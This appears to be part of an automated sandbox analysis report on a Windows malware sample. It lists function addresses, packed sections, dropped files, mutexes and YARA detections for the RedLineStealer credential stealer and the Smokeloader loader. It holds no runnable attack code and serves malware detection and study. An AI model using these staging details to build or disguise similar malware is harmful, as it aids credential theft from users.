Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CD4E0	8_2_6C1CD4E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1F0512	8_2_6C1F0512
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1EED10	8_2_6C1EED10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DFD00	8_2_6C1DFD00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2285F0	8_2_6C2285F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C200DD0	8_2_6C200DD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C229E30	8_2_6C229E30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C215600	8_2_6C215600
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C207E10	8_2_6C207E10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C236E63	8_2_6C236E63
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E9E50	8_2_6C1E9E50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E4640	8_2_6C1E4640
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CC670	8_2_6C1CC670
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C212E4E	8_2_6C212E4E
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C203E50	8_2_6C203E50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C224EA0	8_2_6C224EA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E5E90	8_2_6C1E5E90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22E680	8_2_6C22E680
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2376E3	8_2_6C2376E3
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CBEF0	8_2_6C1CBEF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DFEF0	8_2_6C1DFEF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D9F00	8_2_6C1D9F00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C207710	8_2_6C207710
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2177A0	8_2_6C2177A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1F6FF0	8_2_6C1F6FF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CDFE0	8_2_6C1CDFE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C20B820	8_2_6C20B820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C214820	8_2_6C214820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D7810	8_2_6C1D7810
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E8850	8_2_6C1E8850
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1ED850	8_2_6C1ED850
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C20F070	8_2_6C20F070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1F60A0	8_2_6C1F60A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2058E0	8_2_6C2058E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2350C7	8_2_6C2350C7
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1EC0E0	8_2_6C1EC0E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C21B970	8_2_6C21B970
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23B170	8_2_6C23B170
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1EA940	8_2_6C1EA940
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DD960	8_2_6C1DD960
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1FD9B0	8_2_6C1FD9B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C205190	8_2_6C205190
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C222990	8_2_6C222990
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CC9A0	8_2_6C1CC9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C209A60	8_2_6C209A60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C232AB0	8_2_6C232AB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DCAB0	8_2_6C1DCAB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23BA90	8_2_6C23BA90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1C22A0	8_2_6C1C22A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1F4AA0	8_2_6C1F4AA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C20E2F0	8_2_6C20E2F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C208AC0	8_2_6C208AC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1E1AF0	8_2_6C1E1AF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C20D320	8_2_6C20D320
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1C5340	8_2_6C1C5340
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1DC370	8_2_6C1DC370
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CF380	8_2_6C1CF380
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2353C8	8_2_6C2353C8
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C34AC30	8_2_6C34AC30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C336C00	8_2_6C336C00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C27AC60	8_2_6C27AC60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C26ECC0	8_2_6C26ECC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2CECD0	8_2_6C2CECD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3F8D20	8_2_6C3F8D20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C33ED70	8_2_6C33ED70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C39AD50	8_2_6C39AD50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C274DB0	8_2_6C274DB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C306D90	8_2_6C306D90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3FCDC0	8_2_6C3FCDC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C350E20	8_2_6C350E20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C30EE70	8_2_6C30EE70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2F6E90	8_2_6C2F6E90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C27AEC0	8_2_6C27AEC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C310EC0	8_2_6C310EC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B0F20	8_2_6C3B0F20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C276F10	8_2_6C276F10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C332F70	8_2_6C332F70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2DEF40	8_2_6C2DEF40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B8FB0	8_2_6C3B8FB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C27EFB0	8_2_6C27EFB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C34EFF0	8_2_6C34EFF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C270FE0	8_2_6C270FE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2C0820	8_2_6C2C0820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2FA820	8_2_6C2FA820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C344840	8_2_6C344840
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3768E0	8_2_6C3768E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2C6900	8_2_6C2C6900
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2A8960	8_2_6C2A8960
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3309B0	8_2_6C3309B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3009A0	8_2_6C3009A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C32A9A0	8_2_6C32A9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C38C9E0	8_2_6C38C9E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2A49F0	8_2_6C2A49F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C328A30	8_2_6C328A30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C31EA00	8_2_6C31EA00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2ECA70	8_2_6C2ECA70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2EEA80	8_2_6C2EEA80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C310BA0	8_2_6C310BA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C376BE0	8_2_6C376BE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2D4420	8_2_6C2D4420
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2FA430	8_2_6C2FA430
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C288460	8_2_6C288460
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C39A480	8_2_6C39A480
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C30A4D0	8_2_6C30A4D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2B64D0	8_2_6C2B64D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C310570	8_2_6C310570
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2D2560	8_2_6C2D2560
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B8550	8_2_6C3B8550
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2C8540	8_2_6C2C8540
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C374540	8_2_6C374540
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2645B0	8_2_6C2645B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C33A5E0	8_2_6C33A5E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2FE5F0	8_2_6C2FE5F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2CC650	8_2_6C2CC650
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2CE6E0	8_2_6C2CE6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C30E6E0	8_2_6C30E6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2946D0	8_2_6C2946D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2F0700	8_2_6C2F0700
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C29A7D0	8_2_6C29A7D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C338010	8_2_6C338010
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C33C000	8_2_6C33C000
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2BE070	8_2_6C2BE070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C34C0B0	8_2_6C34C0B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2800B0	8_2_6C2800B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C268090	8_2_6C268090
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C354130	8_2_6C354130

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C3FDAE0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C3FD930 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C3F09D0 appears 184 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C299B10 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C1FCBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C2094D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C293620 appears 49 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 2432

Uses 32bit PE files

Source: 8NjcvPNvUr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2743508597.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000002.2783023147.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2741099564.00000000024AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.2722138020.00000000040D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: random[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 8ec8c5c339.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 8NjcvPNvUr.exe	Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: 8NjcvPNvUr.exe	Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: explorti.exe.0.dr	Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: random[1].exe0.7.dr	Static PE information: Section: ZLIB complexity 1.00023193359375
Source: random[1].exe0.7.dr	Static PE information: Section: ZLIB complexity 0.9943827479338843
Source: random[1].exe0.7.dr	Static PE information: Section: ZLIB complexity 0.9993479330708661
Source: 1c593ec106.exe.7.dr	Static PE information: Section: ZLIB complexity 1.00023193359375
Source: 1c593ec106.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9943827479338843
Source: 1c593ec106.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9993479330708661
Source: random[1].exe.8.dr	Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: random[1].exe.8.dr	Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907
Source: random[1].exe0.8.dr	Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: random[1].exe0.8.dr	Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907
Source: axplong.exe.18.dr	Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: axplong.exe.18.dr	Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@44/53@22/10

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_6C227030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

8_2_6C227030

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8052
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6704
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess848

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
